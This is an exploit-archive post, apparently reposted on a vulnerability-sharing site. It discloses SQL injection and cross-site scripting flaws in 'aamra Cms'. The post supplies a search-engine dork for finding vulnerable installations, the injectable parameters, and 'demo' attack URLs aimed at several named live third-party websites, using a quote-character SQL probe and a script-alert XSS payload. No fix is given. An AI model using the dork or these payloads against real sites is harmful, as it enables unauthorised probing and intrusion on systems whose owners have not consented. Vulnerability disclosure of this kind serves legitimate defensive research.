aamra Cms Sql Injectio - Xss vulnerability

2013-10-26 06:55:47
Inviato da: irist.ir

#################################
#
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@ @ @@@@@@@@@@ @@@ @@@@@@
# @@@ @@@@@@@@@@@ @@@ @@ @@@ @@ @@@ @@@@@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@ @@@ @@ @@@ @@ @@@ @@@ @@@ @@@
# @@@ @@@@@@@@@@@ @@@@@ @@@@@@@@@@ @@@ @@@ @@@ @@@
#
#####################################

# Exploit Title : aamra Cms Sql Injectio / Xss vulnerability

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected]

# Home : http://iedb.ir - http://iedb.ir/acc

# Software Link : http://www.aamra.com.bd/

# Security Risk : High

# Tested on : Linux

# Dork : intext:"Powered by Aamra Infotainment Ltd"

#################################

# Exploit :

# http://site.com/projects.php?id=[sql]

# http://site.com/content.php?action=[xss]

# http://site.com/detail.php?date=[xss]

# Dem0 :

# http://www.monjilgroup.com/projects.php?id=7'

# www.fastgroupbd.com/content.php?action=about_us"><script>alert(/Amir/)</script>

# http://www.newagebd.com/detail.php?date="><script>alert(/Amir/)</script>

#################################

# Tnx To : All Member In Iedb.ir/acc & Iranian Hackers

#################################

# Exploit Archive = http://www.iedb.ir/exploits-756.html

#################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.